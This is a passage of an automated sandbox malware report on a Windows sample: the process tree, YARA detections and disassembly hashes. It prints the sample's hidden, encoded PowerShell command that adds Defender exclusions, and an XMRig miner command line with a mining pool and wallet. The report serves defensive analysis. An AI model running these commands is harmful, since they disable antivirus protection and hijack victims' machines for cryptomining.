2024-09-19 00:25:16 UTC	1369	IN	Data Raw: c8 b3 9c ee f0 56 2d ff 9c 94 b8 21 0e 14 cb 56 d6 ca fc 42 dc a0 b6 c8 85 66 ea 90 e2 28 97 7a a7 65 93 c6 ac 23 87 05 9a 61 be 4a a1 32 85 5f 13 f6 ac a7 96 71 d2 aa 88 ac 37 f0 64 e3 6c 01 89 f2 4d 5b b3 ff 7b aa 47 6e 2a 98 bd 01 92 8f d0 25 7f c0 3f 7e 10 98 5e 5e 3f d7 0f af d2 d2 95 45 40 77 a9 71 40 2c bc 97 aa 8b 3f e1 3a fd 69 d6 6f aa 27 0f 1d b6 ae 2e 77 96 1c 78 d3 08 1e b9 85 27 64 87 a9 b1 11 c2 97 64 f4 1d da c0 3f e2 3b 80 29 ee 48 d8 05 e2 91 ae 8e ae 9f 45 a0 8f 30 6c 62 34 14 ce e6 3b a4 6f 68 ab 6f 48 8b ad 3b 58 12 cc bf 72 4d a3 9b 56 c4 0f 46 5b c6 4a c0 5c 10 26 23 5e 39 88 e3 86 68 1f 6c 91 49 c0 5a fd 67 7e c8 ce 54 4a 21 b2 18 13 c9 21 59 76 49 2c e2 81 82 d0 58 b0 41 85 56 0f fa 2e 76 92 49 22 42 73 dd c3 6a 67 06 cb 77 29 b9 Data Ascii: V-!VBf(ze#aJ2_q7dlM[{Gn*%?~^^?E@wq@,?:io'.wx'dd?;)HE0lb4;ohoH;XrMVF[J\&#^9hlIZg~TJ!!YvI,XAV.vI"Bsjgw)

Target ID:	0
Start time:	20:25:06
Start date:	18/09/2024
Path:	C:\Users\user\Desktop\o9OIGsDt4m.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\o9OIGsDt4m.exe"
Imagebase:	0x1fa0ad30000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2132804685.000001FA1D1C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2129713710.000001FA0B160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2132804685.000001FA1D125000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.2130103490.000001FA0CE27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2130103490.000001FA0CBF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2132804685.000001FA1CEF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:25:11
Start date:	18/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:25:11
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:25:11
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x226af580000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2181255354.00000226C1815000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2181255354.00000226C15E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2167540557.00000226B12E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2181255354.00000226C1431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:25:12
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
Imagebase:	0x23c527e0000
File size:	43'520 bytes
MD5 hash:	11BED2C86507F7DF04BA52CFC7EB7276
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000005.00000002.4614043790.0000023C6581B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.4570473066.0000023C545E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.4614043790.0000023C653B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	20:25:15
Start date:	18/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:25:22
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Imagebase:	0x23f787a0000
File size:	42'800 bytes
MD5 hash:	929EA1AF28AFEA2A3311FD4297425C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.4581896540.0000023F78A26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.4560506841.0000000140799000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000008.00000002.4560506841.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.4581896540.0000023F789F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000008.00000002.4560506841.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	20:25:34
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x1f95d190000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2691830149.000001F95F1C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2696904592.000001F96F405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2691830149.000001F95F0B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2696904592.000001F96F5E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2696904592.000001F96F201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2696904592.000001F96F3B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:25:51
Start date:	18/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF848F36260 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON

Download Yara Rule

Strings

k, xrefs: 00007FF848F41D02

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-4082892380
Opcode ID: 355e006725f6003908be76429040b248a5661fb138cfb44cb6e93fb1ad7a2999
Instruction ID: ff6e1d011f15868dadea923f391fff29d9e6342704ac45f549b0446f62d12c81
Opcode Fuzzy Hash: 355e006725f6003908be76429040b248a5661fb138cfb44cb6e93fb1ad7a2999
Instruction Fuzzy Hash: 54928230A1C9498FDB99EB6CC455AB877E1FFA8750F1401BAD40ED72D6CB29AC42CB44

Function 00007FF8490B6D44 Relevance: 1.7, Strings: 1, Instructions: 478COMMON

Download Yara Rule

Strings

, xrefs: 00007FF8490B7546

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 41b2d9dca1d2ac20bb4b8abf8906d371a6fe4aa723a8dc593b0917f6418fff9a
Instruction ID: e9f38c3cd756dd4faac2c5bcce25c409f631b53df099b2626e517729255a6d33
Opcode Fuzzy Hash: 41b2d9dca1d2ac20bb4b8abf8906d371a6fe4aa723a8dc593b0917f6418fff9a
Instruction Fuzzy Hash: 21E1E761E1D99B4FFBA8AE7C445627967D1EFA4B90F550079C50EC36C2DE28EC428B40

Function 00007FF848F35798 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

<J_H, xrefs: 00007FF848F60271

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: <J_H
API String ID: 0-2744129578
Opcode ID: d318fb98ad2cf0854c38547549f64c32daf84e0b136fd5055c4111799b1587fc
Instruction ID: 21027397971ffbb2d8f336804d1b1bd77334bfe810c5cfb9ca7f7fca0e030acd
Opcode Fuzzy Hash: d318fb98ad2cf0854c38547549f64c32daf84e0b136fd5055c4111799b1587fc
Instruction Fuzzy Hash: 99A14670A1E7465FE74AEF7880561B9BBE1FF86360F1101BEC08ADB2D2DB2858478714

Function 00007FF848F35748 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

<J_H, xrefs: 00007FF848F60271

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: <J_H
API String ID: 0-2744129578
Opcode ID: cbd9c7cf78f3efbdb6c0b4d0fe1d79bd998e8ed66ce8b511c1af3b06f0018052
Instruction ID: d14f463a6254ce2145f937e6abaa3fc94950cfc84b3104d645ad578a86fb9594
Opcode Fuzzy Hash: cbd9c7cf78f3efbdb6c0b4d0fe1d79bd998e8ed66ce8b511c1af3b06f0018052
Instruction Fuzzy Hash: 1751387190DB465FD705FB78941A1FABFE0EF86230F0502BEC089CB292DB2858468799

Function 00007FF848F3394B Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

L_H, xrefs: 00007FF848F33570

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: L_H
API String ID: 0-402390507
Opcode ID: 926053003d569e44db0f95b041067b38826bde5ec8f9489c893a7a4346c72e75
Instruction ID: dd4c00fd91f1dc2458940ee311f3da8a7511db542776305a26e4a46086fffd38
Opcode Fuzzy Hash: 926053003d569e44db0f95b041067b38826bde5ec8f9489c893a7a4346c72e75
Instruction Fuzzy Hash: C2F01D30A0D64A8FE798EF6C949657977D2EF98350F0000BAD94A872D6EE28AC058649

Function 00007FF848F33565 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

L_H, xrefs: 00007FF848F33570

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: L_H
API String ID: 0-402390507
Opcode ID: 147b04f60e4ef9b5989a8b79f77a05e2a1d15e24d32178601a9755ae2192ab45
Instruction ID: aa00ed9feab0d150bf2d5e9cdb1a370c015da6f7b5d926716baacccba4a9bca1
Opcode Fuzzy Hash: 147b04f60e4ef9b5989a8b79f77a05e2a1d15e24d32178601a9755ae2192ab45
Instruction Fuzzy Hash: CAD05E30A0CA4A8FE288F75C985207973D2EB98740F00003AD84A833D2EE14AC014206

Function 00007FF849010F04 Relevance: .9, Instructions: 904COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146837116.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849010000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eabd2a3fd78ed7765dbe46c201daeb55147f5e4cebfa71c895b3492966715270
Instruction ID: 09fb9319410a5f2b67466854305e4eaf45e0fe8a7f5dc4375e1189f8091e8a02
Opcode Fuzzy Hash: eabd2a3fd78ed7765dbe46c201daeb55147f5e4cebfa71c895b3492966715270
Instruction Fuzzy Hash: 8F32B321F1DE8B9FFBF9AA2C142663552D2EFD9690B5805BAC04DC32D7ED2DDC064241

Function 00007FF849011761 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146837116.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849010000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eaef52921e3164100703989ec27c948a0bb8a8ae767310af37791259356d4fc
Instruction ID: 26e7ec4b01c51f9ce20b94921c36f15b8305538baf22e635037c6d79f4accd72
Opcode Fuzzy Hash: 7eaef52921e3164100703989ec27c948a0bb8a8ae767310af37791259356d4fc
Instruction Fuzzy Hash: 11028221F1DD9A8FEAF9BB2C105267D16D2EF95690F6416BAC00DC32C3EE1DE8434285

Function 00007FF8490B3D7E Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3159380c29bf4273f6c68387f1cd00ce503f8880fbf6ccd05aa0af26bb24d809
Instruction ID: 80fc44d8b60745885ff145440b99941dc43cdd84c17ce419665696a70bbd9c59
Opcode Fuzzy Hash: 3159380c29bf4273f6c68387f1cd00ce503f8880fbf6ccd05aa0af26bb24d809
Instruction Fuzzy Hash: 0EB12831A0DECA4FEBA4EF688455AB677E1FF64350B5400B9D00EC7296DE28EC45CB81

Function 00007FF8490B6073 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aeaa849fd59e132630e412dffac91aff957d5165b8e4450e54a8c0fadd12676
Instruction ID: c275a935830a8d01040325edc17db4c136b80b54391e1cca87342d1851df9f9d
Opcode Fuzzy Hash: 8aeaa849fd59e132630e412dffac91aff957d5165b8e4450e54a8c0fadd12676
Instruction Fuzzy Hash: 0CB1C231E1CE8D8FEB94EF6894556A977E1FFA8350B0405B9D40DC7296DE38EC428B81

Function 00007FF848F305B0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c8c1ea4c17522c46a38ae4a1b53e22f89b69baada0a32880b417ef4bba22230
Instruction ID: ae4c3c6b94f9611304b8eb35afc409107571c2c733ad9591fcbaf1e15db9fda4
Opcode Fuzzy Hash: 9c8c1ea4c17522c46a38ae4a1b53e22f89b69baada0a32880b417ef4bba22230
Instruction Fuzzy Hash: E6B1153090E74A5FE746EFB884562B9BBE1FF45360F0501FED08AC72D6DA3898468714

Function 00007FF8490B5AF8 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8c84bb5e4971ada444272985034a4a919a27d2d78c2096c0bfb5ee04ba6ecb
Instruction ID: 112bf47afec9f4f118bd57353c3fe929a6e4e01884c5f715063d356457ff6d40
Opcode Fuzzy Hash: 7d8c84bb5e4971ada444272985034a4a919a27d2d78c2096c0bfb5ee04ba6ecb
Instruction Fuzzy Hash: 41A1973091DA8A8FEFA5FF6884556BA77E1FF64380F544479D40AC7296DE38D8428B80

Function 00007FF8490B84A5 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbddfd5b3b1b7a1750e78115c611d38b32911ff42d492c98e4df9b0382b7df38
Instruction ID: 8179942ef615b8f2e5f42c3816b7d377898c6c01c8fe12f17da53c8d45198104
Opcode Fuzzy Hash: cbddfd5b3b1b7a1750e78115c611d38b32911ff42d492c98e4df9b0382b7df38
Instruction Fuzzy Hash: BF91B23090CA8D4FEB64EF68D8497A9BBF0EF65355F1440BAC44DD71A2DB38A885CB41

Function 00007FF8490B4E1E Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83bd4673f2c0a9ca556fe733ce323ee7934f62c919a1d7375bee1e110ca7ae9a
Instruction ID: 7638ff8f67957166982bffca08f50a8d1de0b661c0eee0ace3a4980ff86550ef
Opcode Fuzzy Hash: 83bd4673f2c0a9ca556fe733ce323ee7934f62c919a1d7375bee1e110ca7ae9a
Instruction Fuzzy Hash: 9A714B3191EBC61FEBA6EFB844155A67BE1EF66350B0805FDC089CB1A3DA1CE846C741

Function 00007FF848F3054F Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8e73bb14cd9b17d6ebc051781901dfa9d7c544d569d054d0f1968b928b7f50
Instruction ID: 4bdf49dcad1e52c36ca2f2e638ec01c04c5d5f6ab183a63059d0c71912e0fc52
Opcode Fuzzy Hash: cd8e73bb14cd9b17d6ebc051781901dfa9d7c544d569d054d0f1968b928b7f50
Instruction Fuzzy Hash: 5D51E73190E64A6FD345AF7894162EABBE0EF46370F0543BFD088CB193DA2C584A8765

Function 00007FF8490B4041 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c916ff12d3ee6515702fc0d00d7ba9e002e706938a05546fa18f24f04ed49b15
Instruction ID: 96b94cfc4dea83671b72aaba202ff72b769e93de1837fc3ad69ccb2973f5a8e3
Opcode Fuzzy Hash: c916ff12d3ee6515702fc0d00d7ba9e002e706938a05546fa18f24f04ed49b15
Instruction Fuzzy Hash: 24517D71A18A4D8FDB98EF68D4446B9B7E1FFA8350B10067AD00ED7296DF35E942CB40

Function 00007FF848F3225D Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5015a9c83de5af07cce8b63493161b578dc963c6889e02e37b44cd3625217203
Instruction ID: 3de16f52d8344d69333621a1b3d82aadd5ae5c556693722eae60336e27665a38
Opcode Fuzzy Hash: 5015a9c83de5af07cce8b63493161b578dc963c6889e02e37b44cd3625217203
Instruction Fuzzy Hash: A251FB7090E7865FD346DF7888166AABFE1EF46360F0502FFD089C72D2CA6C98468765

Function 00007FF8490B77A7 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2bdf719527d90d13f3803e26f9a0d48affc76ae5d6717a120102b7d0dc374b
Instruction ID: 42cb01e4ab59028069a508062eb8d111f8a77b9d8e0158489469855ae00810d9
Opcode Fuzzy Hash: ae2bdf719527d90d13f3803e26f9a0d48affc76ae5d6717a120102b7d0dc374b
Instruction Fuzzy Hash: 47514832E1DD9A5FFFA5FAA89055AB967D1EFA4380B4500B9C00EC76A2DE1CDC02C741

Function 00007FF8490B65BD Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320601a2e8257c8dfb0f9cffa384dbf4230c0b59a7013865331ce721203a03ed
Instruction ID: 4610ff3ccfec4d2ab4297356a6c6cae031956505d389c5f83d13a299e529680c
Opcode Fuzzy Hash: 320601a2e8257c8dfb0f9cffa384dbf4230c0b59a7013865331ce721203a03ed
Instruction Fuzzy Hash: 3F413830D0CAC95FD729AB68984A6B97BE4FF56365F04027FE089C71D3CE24A802CB41

Function 00007FF8490B3655 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

